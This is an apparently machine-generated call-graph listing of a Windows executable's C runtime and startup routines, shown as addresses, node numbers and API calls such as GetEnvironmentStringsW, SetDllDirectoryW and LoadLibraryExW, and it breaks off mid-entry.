7ff65e29a948 __free_lconv_mon 11 API calls 16444->16447 16527 7ff65e29a4a4 16445->16527 16449 7ff65e2a0b67 16447->16449 16454 7ff65e29a948 __free_lconv_mon 11 API calls 16449->16454 16450 7ff65e2a0b80 16611 7ff65e2a7244 16450->16611 16451 7ff65e2a0c0b 16453 7ff65e29a900 _isindst 17 API calls 16451->16453 16456 7ff65e2a0c1f 16453->16456 16454->16417 16459 7ff65e2a0c48 16456->16459 16465 7ff65e2a0c58 16456->16465 16457 7ff65e2a0ba7 16460 7ff65e294f08 _get_daylight 11 API calls 16457->16460 16458 7ff65e2a0bc8 16462 7ff65e29a948 __free_lconv_mon 11 API calls 16458->16462 16461 7ff65e294f08 _get_daylight 11 API calls 16459->16461 16463 7ff65e2a0bac 16460->16463 16464 7ff65e2a0c4d 16461->16464 16462->16436 16467 7ff65e29a948 __free_lconv_mon 11 API calls 16463->16467 16466 7ff65e2a0f3b 16465->16466 16468 7ff65e2a0c7a 16465->16468 16469 7ff65e294f08 _get_daylight 11 API calls 16466->16469 16467->16449 16470 7ff65e2a0c97 16468->16470 16630 7ff65e2a106c 16468->16630 16471 7ff65e2a0f40 16469->16471 16474 7ff65e2a0d0b 16470->16474 16476 7ff65e2a0cbf 16470->16476 16482 7ff65e2a0cff 16470->16482 16473 7ff65e29a948 __free_lconv_mon 11 API calls 16471->16473 16473->16464 16478 7ff65e2a0d33 16474->16478 16483 7ff65e29eb98 _get_daylight 11 API calls 16474->16483 16497 7ff65e2a0cce 16474->16497 16475 7ff65e2a0dbe 16486 7ff65e2a0ddb 16475->16486 16494 7ff65e2a0e2e 16475->16494 16645 7ff65e2996fc 16476->16645 16480 7ff65e29eb98 _get_daylight 11 API calls 16478->16480 16478->16482 16478->16497 16485 7ff65e2a0d55 16480->16485 16481 7ff65e29a948 __free_lconv_mon 11 API calls 16481->16464 16482->16475 16482->16497 16651 7ff65e2a6fec 16482->16651 16487 7ff65e2a0d25 16483->16487 16490 7ff65e29a948 __free_lconv_mon 11 API calls 16485->16490 16491 7ff65e29a948 __free_lconv_mon 11 API calls 16486->16491 16492 7ff65e29a948 __free_lconv_mon 11 API calls 16487->16492 16488 7ff65e2a0ce7 16488->16482 16496 7ff65e2a106c 45 API calls 16488->16496 16489 7ff65e2a0cc9 16493 7ff65e294f08 _get_daylight 11 API calls 16489->16493 16490->16482 16495 7ff65e2a0de4 16491->16495 16492->16478 16493->16497 16494->16497 16498 7ff65e2a33dc 40 API calls 16494->16498 16501 7ff65e2a33dc 40 API calls 16495->16501 16504 7ff65e2a0dea 16495->16504 16496->16482 16497->16481 16499 7ff65e2a0e6c 16498->16499 16500 7ff65e29a948 __free_lconv_mon 11 API calls 16499->16500 16502 7ff65e2a0e76 16500->16502 16505 7ff65e2a0e16 16501->16505 16502->16497 16502->16504 16503 7ff65e2a0f2f 16506 7ff65e29a948 __free_lconv_mon 11 API calls 16503->16506 16504->16503 16508 7ff65e29eb98 _get_daylight 11 API calls 16504->16508 16507 7ff65e29a948 __free_lconv_mon 11 API calls 16505->16507 16506->16464 16507->16504 16509 7ff65e2a0ebb 16508->16509 16510 7ff65e2a0ec3 16509->16510 16511 7ff65e2a0ecc 16509->16511 16513 7ff65e29a948 __free_lconv_mon 11 API calls 16510->16513 16536 7ff65e2a0474 16511->16536 16526 7ff65e2a0eca 16513->16526 16515 7ff65e2a0f6f 16519 7ff65e29a900 _isindst 17 API calls 16515->16519 16516 7ff65e2a0ee2 SetEnvironmentVariableW 16517 7ff65e2a0f27 16516->16517 16518 7ff65e2a0f06 16516->16518 16523 7ff65e29a948 __free_lconv_mon 11 API calls 16517->16523 16521 7ff65e294f08 _get_daylight 11 API calls 16518->16521 16522 7ff65e2a0f83 16519->16522 16520 7ff65e29a948 __free_lconv_mon 11 API calls 16520->16464 16524 7ff65e2a0f0b 16521->16524 16523->16503 16525 7ff65e29a948 __free_lconv_mon 11 API calls 16524->16525 16525->16526 16526->16520 16528 7ff65e29a4b1 16527->16528 16529 7ff65e29a4bb 16527->16529 16528->16529 16533 7ff65e29a4d6 16528->16533 16530 7ff65e294f08 _get_daylight 11 API calls 16529->16530 16535 7ff65e29a4c2 16530->16535 16531 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16532 7ff65e29a4ce 16531->16532 16532->16450 16532->16451 16533->16532 16534 7ff65e294f08 _get_daylight 11 API calls 16533->16534 16534->16535 16535->16531 16537 7ff65e2a048b 16536->16537 16538 7ff65e2a0481 16536->16538 16539 7ff65e294f08 _get_daylight 11 API calls 16537->16539 16538->16537 16542 7ff65e2a04a7 16538->16542 16544 7ff65e2a0493 16539->16544 16540 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16541 7ff65e2a049f 16540->16541 16541->16515 16541->16516 16542->16541 16543 7ff65e294f08 _get_daylight 11 API calls 16542->16543 16543->16544 16544->16540 16546 7ff65e2a0fa1 16545->16546 16547 7ff65e2a0fb9 16545->16547 16546->16403 16548 7ff65e29eb98 _get_daylight 11 API calls 16547->16548 16549 7ff65e2a0fdd 16548->16549 16550 7ff65e2a103e 16549->16550 16554 7ff65e29eb98 _get_daylight 11 API calls 16549->16554 16555 7ff65e29a948 __free_lconv_mon 11 API calls 16549->16555 16556 7ff65e29a4a4 __std_exception_copy 37 API calls 16549->16556 16557 7ff65e2a104d 16549->16557 16559 7ff65e2a1062 16549->16559 16552 7ff65e29a948 __free_lconv_mon 11 API calls 16550->16552 16551 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16553 7ff65e2a1068 16551->16553 16552->16546 16554->16549 16555->16549 16556->16549 16558 7ff65e29a900 _isindst 17 API calls 16557->16558 16558->16559 16559->16551 16561 7ff65e2996d0 16560->16561 16564 7ff65e2996d9 16560->16564 16561->16564 16675 7ff65e299198 16561->16675 16564->16419 16564->16420 16567 7ff65e2a6254 16566->16567 16568 7ff65e2a7139 16566->16568 16569 7ff65e2a6261 16567->16569 16574 7ff65e2a6297 16567->16574 16570 7ff65e294f4c 45 API calls 16568->16570 16572 7ff65e294f08 _get_daylight 11 API calls 16569->16572 16586 7ff65e2a6208 16569->16586 16571 7ff65e2a716d 16570->16571 16575 7ff65e2a7172 16571->16575 16579 7ff65e2a7183 16571->16579 16582 7ff65e2a719a 16571->16582 16576 7ff65e2a626b 16572->16576 16573 7ff65e2a62c1 16577 7ff65e294f08 _get_daylight 11 API calls 16573->16577 16574->16573 16578 7ff65e2a62e6 16574->16578 16575->16413 16580 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16576->16580 16581 7ff65e2a62c6 16577->16581 16587 7ff65e294f4c 45 API calls 16578->16587 16594 7ff65e2a62d1 16578->16594 16583 7ff65e294f08 _get_daylight 11 API calls 16579->16583 16584 7ff65e2a6276 16580->16584 16585 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16581->16585 16589 7ff65e2a71a4 16582->16589 16590 7ff65e2a71b6 16582->16590 16588 7ff65e2a7188 16583->16588 16584->16413 16585->16594 16586->16413 16587->16594 16595 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16588->16595 16591 7ff65e294f08 _get_daylight 11 API calls 16589->16591 16592 7ff65e2a71de 16590->16592 16593 7ff65e2a71c7 16590->16593 16596 7ff65e2a71a9 16591->16596 16938 7ff65e2a8f4c 16592->16938 16929 7ff65e2a62a4 16593->16929 16594->16413 16595->16575 16599 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16596->16599 16599->16575 16601 7ff65e294f08 _get_daylight 11 API calls 16601->16575 16603 7ff65e2a33fe 16602->16603 16604 7ff65e2a341b 16602->16604 16603->16604 16605 7ff65e2a340c 16603->16605 16606 7ff65e2a3425 16604->16606 16978 7ff65e2a7c38 16604->16978 16607 7ff65e294f08 _get_daylight 11 API calls 16605->16607 16985 7ff65e2a7c74 16606->16985 16610 7ff65e2a3411 __scrt_get_show_window_mode 16607->16610 16610->16438 16612 7ff65e294f4c 45 API calls 16611->16612 16613 7ff65e2a72aa 16612->16613 16614 7ff65e2a72b8 16613->16614 16997 7ff65e29ef24 16613->16997 17000 7ff65e2954ac 16614->17000 16618 7ff65e2a73a4 16620 7ff65e2a73b5 16618->16620 16622 7ff65e29a948 __free_lconv_mon 11 API calls 16618->16622 16619 7ff65e294f4c 45 API calls 16621 7ff65e2a7327 16619->16621 16623 7ff65e2a0ba3 16620->16623 16625 7ff65e29a948 __free_lconv_mon 11 API calls 16620->16625 16624 7ff65e29ef24 5 API calls 16621->16624 16626 7ff65e2a7330 16621->16626 16622->16620 16623->16457 16623->16458 16624->16626 16625->16623 16627 7ff65e2954ac 14 API calls 16626->16627 16628 7ff65e2a738b 16627->16628 16628->16618 16629 7ff65e2a7393 SetEnvironmentVariableW 16628->16629 16629->16618 16631 7ff65e2a10ac 16630->16631 16637 7ff65e2a108f 16630->16637 16632 7ff65e29eb98 _get_daylight 11 API calls 16631->16632 16640 7ff65e2a10d0 16632->16640 16633 7ff65e2a1131 16635 7ff65e29a948 __free_lconv_mon 11 API calls 16633->16635 16634 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16636 7ff65e2a115a 16634->16636 16635->16637 16637->16470 16638 7ff65e29eb98 _get_daylight 11 API calls 16638->16640 16639 7ff65e29a948 __free_lconv_mon 11 API calls 16639->16640 16640->16633 16640->16638 16640->16639 16641 7ff65e2a0474 37 API calls 16640->16641 16642 7ff65e2a1140 16640->16642 16644 7ff65e2a1154 16640->16644 16641->16640 16643 7ff65e29a900 _isindst 17 API calls 16642->16643 16643->16644 16644->16634 16646 7ff65e299715 16645->16646 16647 7ff65e29970c 16645->16647 16646->16488 16646->16489 16647->16646 17022 7ff65e29920c 16647->17022 16652 7ff65e2a6ff9 16651->16652 16655 7ff65e2a7026 16651->16655 16653 7ff65e2a6ffe 16652->16653 16652->16655 16654 7ff65e294f08 _get_daylight 11 API calls 16653->16654 16657 7ff65e2a7003 16654->16657 16656 7ff65e2a706a 16655->16656 16659 7ff65e2a7089 16655->16659 16673 7ff65e2a705e __crtLCMapStringW 16655->16673 16658 7ff65e294f08 _get_daylight 11 API calls 16656->16658 16660 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16657->16660 16661 7ff65e2a706f 16658->16661 16662 7ff65e2a7093 16659->16662 16663 7ff65e2a70a5 16659->16663 16664 7ff65e2a700e 16660->16664 16666 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16661->16666 16667 7ff65e294f08 _get_daylight 11 API calls 16662->16667 16665 7ff65e294f4c 45 API calls 16663->16665 16664->16482 16669 7ff65e2a70b2 16665->16669 16666->16673 16668 7ff65e2a7098 16667->16668 16670 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16668->16670 16669->16673 17069 7ff65e2a8b08 16669->17069 16670->16673 16673->16482 16674 7ff65e294f08 _get_daylight 11 API calls 16674->16673 16676 7ff65e2991b1 16675->16676 16677 7ff65e2991ad 16675->16677 16698 7ff65e2a25f0 16676->16698 16677->16564 16690 7ff65e2994ec 16677->16690 16682 7ff65e2991cf 16724 7ff65e29927c 16682->16724 16683 7ff65e2991c3 16685 7ff65e29a948 __free_lconv_mon 11 API calls 16683->16685 16685->16677 16687 7ff65e29a948 __free_lconv_mon 11 API calls 16688 7ff65e2991f6 16687->16688 16689 7ff65e29a948 __free_lconv_mon 11 API calls 16688->16689 16689->16677 16691 7ff65e299515 16690->16691 16693 7ff65e29952e 16690->16693 16691->16564 16692 7ff65e2a07e8 WideCharToMultiByte 16692->16693 16693->16691 16693->16692 16694 7ff65e29eb98 _get_daylight 11 API calls 16693->16694 16695 7ff65e2995be 16693->16695 16697 7ff65e29a948 __free_lconv_mon 11 API calls 16693->16697 16694->16693 16696 7ff65e29a948 __free_lconv_mon 11 API calls 16695->16696 16696->16691 16697->16693 16699 7ff65e2991b6 16698->16699 16700 7ff65e2a25fd 16698->16700 16704 7ff65e2a292c GetEnvironmentStringsW 16699->16704 16743 7ff65e29b224 16700->16743 16705 7ff65e2991bb 16704->16705 16706 7ff65e2a295c 16704->16706 16705->16682 16705->16683 16707 7ff65e2a07e8 WideCharToMultiByte 16706->16707 16708 7ff65e2a29ad 16707->16708 16709 7ff65e2a29b4 FreeEnvironmentStringsW 16708->16709 16710 7ff65e29d5fc _fread_nolock 12 API calls 16708->16710 16709->16705 16711 7ff65e2a29c7 16710->16711 16712 7ff65e2a29cf 16711->16712 16713 7ff65e2a29d8 16711->16713 16714 7ff65e29a948 __free_lconv_mon 11 API calls 16712->16714 16715 7ff65e2a07e8 WideCharToMultiByte 16713->16715 16716 7ff65e2a29d6 16714->16716 16717 7ff65e2a29fb 16715->16717 16716->16709 16718 7ff65e2a29ff 16717->16718 16719 7ff65e2a2a09 16717->16719 16720 7ff65e29a948 __free_lconv_mon 11 API calls 16718->16720 16721 7ff65e29a948 __free_lconv_mon 11 API calls 16719->16721 16722 7ff65e2a2a07 FreeEnvironmentStringsW 16720->16722 16721->16722 16722->16705 16725 7ff65e2992a1 16724->16725 16726 7ff65e29eb98 _get_daylight 11 API calls 16725->16726 16737 7ff65e2992d7 16726->16737 16727 7ff65e2992df 16728 7ff65e29a948 __free_lconv_mon 11 API calls 16727->16728 16730 7ff65e2991d7 16728->16730 16729 7ff65e299352 16731 7ff65e29a948 __free_lconv_mon 11 API calls 16729->16731 16730->16687 16731->16730 16732 7ff65e29eb98 _get_daylight 11 API calls 16732->16737 16733 7ff65e299341 16923 7ff65e2994a8 16733->16923 16734 7ff65e29a4a4 __std_exception_copy 37 API calls 16734->16737 16737->16727 16737->16729 16737->16732 16737->16733 16737->16734 16738 7ff65e299377 16737->16738 16741 7ff65e29a948 __free_lconv_mon 11 API calls 16737->16741 16740 7ff65e29a900 _isindst 17 API calls 16738->16740 16739 7ff65e29a948 __free_lconv_mon 11 API calls 16739->16727 16742 7ff65e29938a 16740->16742 16741->16737 16744 7ff65e29b250 FlsSetValue 16743->16744 16745 7ff65e29b235 FlsGetValue 16743->16745 16746 7ff65e29b242 16744->16746 16748 7ff65e29b25d 16744->16748 16745->16746 16747 7ff65e29b24a 16745->16747 16749 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16746->16749 16751 7ff65e29b248 16746->16751 16747->16744 16750 7ff65e29eb98 _get_daylight 11 API calls 16748->16750 16752 7ff65e29b2c5 16749->16752 16753 7ff65e29b26c 16750->16753 16763 7ff65e2a22c4 16751->16763 16754 7ff65e29b28a FlsSetValue 16753->16754 16755 7ff65e29b27a FlsSetValue 16753->16755 16757 7ff65e29b296 FlsSetValue 16754->16757 16758 7ff65e29b2a8 16754->16758 16756 7ff65e29b283 16755->16756 16760 7ff65e29a948 __free_lconv_mon 11 API calls 16756->16760 16757->16756 16759 7ff65e29aef4 _get_daylight 11 API calls 16758->16759 16761 7ff65e29b2b0 16759->16761 16760->16746 16762 7ff65e29a948 __free_lconv_mon 11 API calls 16761->16762 16762->16751 16786 7ff65e2a2534 16763->16786 16765 7ff65e2a22f9 16801 7ff65e2a1fc4 16765->16801 16768 7ff65e29d5fc _fread_nolock 12 API calls 16769 7ff65e2a2327 16768->16769 16770 7ff65e2a232f 16769->16770 16772 7ff65e2a233e 16769->16772 16771 7ff65e29a948 __free_lconv_mon 11 API calls 16770->16771 16784 7ff65e2a2316 16771->16784 16772->16772 16808 7ff65e2a266c 16772->16808 16775 7ff65e2a243a 16776 7ff65e294f08 _get_daylight 11 API calls 16775->16776 16778 7ff65e2a243f 16776->16778 16777 7ff65e2a2495 16785 7ff65e2a24fc 16777->16785 16819 7ff65e2a1df4 16777->16819 16780 7ff65e29a948 __free_lconv_mon 11 API calls 16778->16780 16779 7ff65e2a2454 16779->16777 16781 7ff65e29a948 __free_lconv_mon 11 API calls 16779->16781 16780->16784 16781->16777 16783 7ff65e29a948 __free_lconv_mon 11 API calls 16783->16784 16784->16699 16785->16783 16787 7ff65e2a2557 16786->16787 16790 7ff65e2a2561 16787->16790 16834 7ff65e2a02d8 EnterCriticalSection 16787->16834 16789 7ff65e2a25d3 16789->16765 16790->16789 16793 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16790->16793 16794 7ff65e2a25eb 16793->16794 16797 7ff65e2a2642 16794->16797 16798 7ff65e29b224 50 API calls 16794->16798 16797->16765 16799 7ff65e2a262c 16798->16799 16800 7ff65e2a22c4 65 API calls 16799->16800 16800->16797 16802 7ff65e294f4c 45 API calls 16801->16802 16803 7ff65e2a1fd8 16802->16803 16804 7ff65e2a1fe4 GetOEMCP 16803->16804 16805 7ff65e2a1ff6 16803->16805 16806 7ff65e2a200b 16804->16806 16805->16806 16807 7ff65e2a1ffb GetACP 16805->16807 16806->16768 16806->16784 16807->16806 16809 7ff65e2a1fc4 47 API calls 16808->16809 16810 7ff65e2a2699 16809->16810 16811 7ff65e2a27ef 16810->16811 16812 7ff65e2a26d6 IsValidCodePage 16810->16812 16818 7ff65e2a26f0 __scrt_get_show_window_mode 16810->16818 16813 7ff65e28c550 _log10_special 8 API calls 16811->16813 16812->16811 16814 7ff65e2a26e7 16812->16814 16815 7ff65e2a2431 16813->16815 16816 7ff65e2a2716 GetCPInfo 16814->16816 16814->16818 16815->16775 16815->16779 16816->16811 16816->16818 16835 7ff65e2a20dc 16818->16835 16922 7ff65e2a02d8 EnterCriticalSection 16819->16922 16836 7ff65e2a2119 GetCPInfo 16835->16836 16845 7ff65e2a220f 16835->16845 16842 7ff65e2a212c 16836->16842 16836->16845 16837 7ff65e28c550 _log10_special 8 API calls 16839 7ff65e2a22ae 16837->16839 16839->16811 16846 7ff65e2a2e40 16842->16846 16845->16837 16847 7ff65e294f4c 45 API calls 16846->16847 16848 7ff65e2a2e82 16847->16848 16866 7ff65e29f8a0 16848->16866 16868 7ff65e29f8a9 MultiByteToWideChar 16866->16868 16924 7ff65e299349 16923->16924 16925 7ff65e2994ad 16923->16925 16924->16739 16926 7ff65e2994d6 16925->16926 16927 7ff65e29a948 __free_lconv_mon 11 API calls 16925->16927 16928 7ff65e29a948 __free_lconv_mon 11 API calls 16926->16928 16927->16925 16928->16924 16930 7ff65e2a62c1 16929->16930 16931 7ff65e2a62d8 16929->16931 16932 7ff65e294f08 _get_daylight 11 API calls 16930->16932 16931->16930 16933 7ff65e2a62e6 16931->16933 16934 7ff65e2a62c6 16932->16934 16936 7ff65e294f4c 45 API calls 16933->16936 16937 7ff65e2a62d1 16933->16937 16935 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16934->16935 16935->16937 16936->16937 16937->16575 16939 7ff65e294f4c 45 API calls 16938->16939 16940 7ff65e2a8f71 16939->16940 16943 7ff65e2a8bc8 16940->16943 16946 7ff65e2a8c16 16943->16946 16944 7ff65e28c550 _log10_special 8 API calls 16945 7ff65e2a7205 16944->16945 16945->16575 16945->16601 16947 7ff65e2a8c9d 16946->16947 16949 7ff65e2a8c88 GetCPInfo 16946->16949 16952 7ff65e2a8ca1 16946->16952 16948 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16947->16948 16947->16952 16950 7ff65e2a8d35 16948->16950 16949->16947 16949->16952 16951 7ff65e29d5fc _fread_nolock 12 API calls 16950->16951 16950->16952 16953 7ff65e2a8d6c 16950->16953 16951->16953 16952->16944 16953->16952 16954 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16953->16954 16955 7ff65e2a8dda 16954->16955 16956 7ff65e2a8ebc 16955->16956 16957 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16955->16957 16956->16952 16958 7ff65e29a948 __free_lconv_mon 11 API calls 16956->16958 16959 7ff65e2a8e00 16957->16959 16958->16952 16959->16956 16960 7ff65e29d5fc _fread_nolock 12 API calls 16959->16960 16961 7ff65e2a8e2d 16959->16961 16960->16961 16961->16956 16962 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16961->16962 16963 7ff65e2a8ea4 16962->16963 16964 7ff65e2a8ec4 16963->16964 16965 7ff65e2a8eaa 16963->16965 16972 7ff65e29ef68 16964->16972 16965->16956 16968 7ff65e29a948 __free_lconv_mon 11 API calls 16965->16968 16968->16956 16969 7ff65e2a8f03 16969->16952 16971 7ff65e29a948 __free_lconv_mon 11 API calls 16969->16971 16970 7ff65e29a948 __free_lconv_mon 11 API calls 16970->16969 16971->16952 16973 7ff65e29ed10 __crtLCMapStringW 5 API calls 16972->16973 16974 7ff65e29efa6 16973->16974 16975 7ff65e29efae 16974->16975 16976 7ff65e29f1d0 __crtLCMapStringW 5 API calls 16974->16976 16975->16969 16975->16970 16977 7ff65e29f017 CompareStringW 16976->16977 16977->16975 16979 7ff65e2a7c41 16978->16979 16980 7ff65e2a7c5a HeapSize 16978->16980 16981 7ff65e294f08 _get_daylight 11 API calls 16979->16981 16982 7ff65e2a7c46 16981->16982 16983 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16982->16983 16984 7ff65e2a7c51 16983->16984 16984->16606 16986 7ff65e2a7c93 16985->16986 16987 7ff65e2a7c89 16985->16987 16988 7ff65e2a7c98 16986->16988 16995 7ff65e2a7c9f _get_daylight 16986->16995 16989 7ff65e29d5fc _fread_nolock 12 API calls 16987->16989 16990 7ff65e29a948 __free_lconv_mon 11 API calls 16988->16990 16993 7ff65e2a7c91 16989->16993 16990->16993 16991 7ff65e2a7cd2 HeapReAlloc 16991->16993 16991->16995 16992 7ff65e2a7ca5 16994 7ff65e294f08 _get_daylight 11 API calls 16992->16994 16993->16610 16994->16993 16995->16991 16995->16992 16996 7ff65e2a3590 _get_daylight 2 API calls 16995->16996 16996->16995 16998 7ff65e29ed10 __crtLCMapStringW 5 API calls 16997->16998 16999 7ff65e29ef44 16998->16999 16999->16614 17001 7ff65e2954d6 17000->17001 17002 7ff65e2954fa 17000->17002 17005 7ff65e29a948 __free_lconv_mon 11 API calls 17001->17005 17009 7ff65e2954e5 17001->17009 17003 7ff65e2954ff 17002->17003 17004 7ff65e295554 17002->17004 17007 7ff65e295514 17003->17007 17003->17009 17010 7ff65e29a948 __free_lconv_mon 11 API calls 17003->17010 17006 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 17004->17006 17005->17009 17016 7ff65e295570 17006->17016 17011 7ff65e29d5fc _fread_nolock 12 API calls 17007->17011 17008 7ff65e295577 GetLastError 17012 7ff65e294e7c _fread_nolock 11 API calls 17008->17012 17009->16618 17009->16619 17010->17007 17011->17009 17014 7ff65e295584 17012->17014 17013 7ff65e2955b2 17013->17009 17017 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 17013->17017 17019 7ff65e294f08 _get_daylight 11 API calls 17014->17019 17015 7ff65e2955a5 17021 7ff65e29d5fc _fread_nolock 12 API calls 17015->17021 17016->17008 17016->17013 17016->17015 17020 7ff65e29a948 __free_lconv_mon 11 API calls 17016->17020 17018 7ff65e2955f6 17017->17018 17018->17008 17018->17009 17019->17009 17020->17015 17021->17013 17023 7ff65e299225 17022->17023 17030 7ff65e299221 17022->17030 17043 7ff65e2a2a3c GetEnvironmentStringsW 17023->17043 17026 7ff65e29923e 17050 7ff65e29938c 17026->17050 17027 7ff65e299232 17028 7ff65e29a948 __free_lconv_mon 11 API calls 17027->17028 17028->17030 17030->16646 17035 7ff65e2995cc 17030->17035 17032 7ff65e29a948 __free_lconv_mon 11 API calls 17033 7ff65e299265 17032->17033 17034 7ff65e29a948 __free_lconv_mon 11 API calls 17033->17034 17034->17030 17036 7ff65e299606 17035->17036 17037 7ff65e2995ef 17035->17037 17036->17037 17038 7ff65e29eb98 _get_daylight 11 API calls 17036->17038 17039 7ff65e29967a 17036->17039 17040 7ff65e29f8a0 MultiByteToWideChar _fread_nolock 17036->17040 17042 7ff65e29a948 __free_lconv_mon 11 API calls 17036->17042 17037->16646 17038->17036 17041 7ff65e29a948 __free_lconv_mon 11 API calls 17039->17041 17040->17036 17041->17037 17042->17036 17044 7ff65e2a2a60 17043->17044 17045 7ff65e29922a 17043->17045 17046 7ff65e29d5fc _fread_nolock 12 API calls 17044->17046 17045->17026 17045->17027 17047 7ff65e2a2a97 memcpy_s 17046->17047 17048 7ff65e29a948 __free_lconv_mon 11 API calls 17047->17048 17049 7ff65e2a2ab7 FreeEnvironmentStringsW 17048->17049 17049->17045 17051 7ff65e2993b4 17050->17051 17052 7ff65e29eb98 _get_daylight 11 API calls 17051->17052 17061 7ff65e2993ef 17052->17061 17053 7ff65e29a948 __free_lconv_mon 11 API calls 17054 7ff65e299246 17053->17054 17054->17032 17055 7ff65e299471 17056 7ff65e29a948 __free_lconv_mon 11 API calls 17055->17056 17056->17054 17057 7ff65e29eb98 _get_daylight 11 API calls 17057->17061 17058 7ff65e299460 17060 7ff65e2994a8 11 API calls 17058->17060 17059 7ff65e2a0474 37 API calls 17059->17061 17062 7ff65e299468 17060->17062 17061->17055 17061->17057 17061->17058 17061->17059 17063 7ff65e299494 17061->17063 17066 7ff65e29a948 __free_lconv_mon 11 API calls 17061->17066 17067 7ff65e2993f7 17061->17067 17064 7ff65e29a948 __free_lconv_mon 11 API calls 17062->17064 17065 7ff65e29a900 _isindst 17 API calls 17063->17065 17064->17067 17068 7ff65e2994a6 17065->17068 17066->17061 17067->17053 17070 7ff65e2a8b31 __crtLCMapStringW 17069->17070 17071 7ff65e29ef68 6 API calls 17070->17071 17072 7ff65e2a70ee 17070->17072 17071->17072 17072->16673 17072->16674 17073 7ff65e28cc3c 17094 7ff65e28ce0c 17073->17094 17076 7ff65e28cd88 17248 7ff65e28d12c IsProcessorFeaturePresent 17076->17248 17077 7ff65e28cc58 __scrt_acquire_startup_lock 17079 7ff65e28cd92 17077->17079 17086 7ff65e28cc76 __scrt_release_startup_lock 17077->17086 17080 7ff65e28d12c 7 API calls 17079->17080 17082 7ff65e28cd9d __CxxCallCatchBlock 17080->17082 17081 7ff65e28cc9b 17083 7ff65e28cd21 17100 7ff65e28d274 17083->17100 17085 7ff65e28cd26 17103 7ff65e281000 17085->17103 17086->17081 17086->17083 17237 7ff65e299b2c 17086->17237 17092 7ff65e28cd49 17092->17082 17244 7ff65e28cf90 17092->17244 17095 7ff65e28ce14 17094->17095 17096 7ff65e28ce20 __scrt_dllmain_crt_thread_attach 17095->17096 17097 7ff65e28cc50 17096->17097 17098 7ff65e28ce2d 17096->17098 17097->17076 17097->17077 17098->17097 17255 7ff65e28d888 17098->17255 17101 7ff65e2aa4d0 __scrt_get_show_window_mode 17100->17101 17102 7ff65e28d28b GetStartupInfoW 17101->17102 17102->17085 17104 7ff65e281009 17103->17104 17282 7ff65e295484 17104->17282 17106 7ff65e2837fb 17289 7ff65e2836b0 17106->17289 17110 7ff65e28c550 _log10_special 8 API calls 17112 7ff65e283ca7 17110->17112 17242 7ff65e28d2b8 GetModuleHandleW 17112->17242 17113 7ff65e28383c 17456 7ff65e281c80 17113->17456 17114 7ff65e28391b 17465 7ff65e2845c0 17114->17465 17118 7ff65e28385b 17361 7ff65e288830 17118->17361 17119 7ff65e28396a 17488 7ff65e282710 17119->17488 17121 7ff65e28388e 17131 7ff65e2838bb __vcrt_freefls 17121->17131 17460 7ff65e2889a0 17121->17460 17124 7ff65e28395d 17125 7ff65e283984 17124->17125 17126 7ff65e283962 17124->17126 17129 7ff65e281c80 49 API calls 17125->17129 17484 7ff65e29004c 17126->17484 17130 7ff65e2839a3 17129->17130 17135 7ff65e281950 115 API calls 17130->17135 17132 7ff65e288830 14 API calls 17131->17132 17140 7ff65e2838de __vcrt_freefls 17131->17140 17132->17140 17133 7ff65e288940 40 API calls 17134 7ff65e283a0b 17133->17134 17136 7ff65e2889a0 40 API calls 17134->17136 17137 7ff65e2839ce 17135->17137 17138 7ff65e283a17 17136->17138 17137->17118 17139 7ff65e2839de 17137->17139 17141 7ff65e2889a0 40 API calls 17138->17141 17143 7ff65e282710 54 API calls 17139->17143 17140->17133 17145 7ff65e28390e __vcrt_freefls 17140->17145 17142 7ff65e283a23 17141->17142 17144 7ff65e2889a0 40 API calls 17142->17144 17184 7ff65e283808 __vcrt_freefls 17143->17184 17144->17145 17146 7ff65e288830 14 API calls 17145->17146 17147 7ff65e283a3b 17146->17147 17148 7ff65e283b2f 17147->17148 17149 7ff65e283a60 __vcrt_freefls 17147->17149 17150 7ff65e282710 54 API calls 17148->17150 17156 7ff65e283aab 17149->17156 17374 7ff65e288940 17149->17374 17150->17184 17152 7ff65e288830 14 API calls 17153 7ff65e283bf4 __vcrt_freefls 17152->17153 17154 7ff65e283c46 17153->17154 17155 7ff65e283d41 17153->17155 17157 7ff65e283cd4 17154->17157 17158 7ff65e283c50 17154->17158 17499 7ff65e2844e0 17155->17499 17156->17152 17161 7ff65e288830 14 API calls 17157->17161 17381 7ff65e2890e0 17158->17381 17164 7ff65e283ce0 17161->17164 17162 7ff65e283d4f 17165 7ff65e283d65 17162->17165 17166 7ff65e283d71 17162->17166 17170 7ff65e283ced 17164->17170 17177 7ff65e283c61 17164->17177 17502 7ff65e284630 17165->17502 17167 7ff65e281c80 49 API calls 17166->17167 17178 7ff65e283cc8 __vcrt_freefls 17167->17178 17171 7ff65e281c80 49 API calls 17170->17171 17175 7ff65e283d0b 17171->17175 17172 7ff65e283dc4 17431 7ff65e289390 17172->17431 17174 7ff65e282710 54 API calls 17174->17184 17175->17178 17179 7ff65e283d12 17175->17179 17177->17174 17178->17172 17180 7ff65e283da7 SetDllDirectoryW LoadLibraryExW 17178->17180 17182 7ff65e282710 54 API calls 17179->17182 17180->17172 17181 7ff65e283dd7 SetDllDirectoryW 17185 7ff65e283e0a 17181->17185 17226 7ff65e283e5a 17181->17226 17182->17184 17184->17110 17187 7ff65e288830 14 API calls 17185->17187 17186 7ff65e284008 17189 7ff65e284035 17186->17189 17190 7ff65e284012 PostMessageW GetMessageW 17186->17190 17194 7ff65e283e16 __vcrt_freefls 17187->17194 17188 7ff65e283f1b 17436 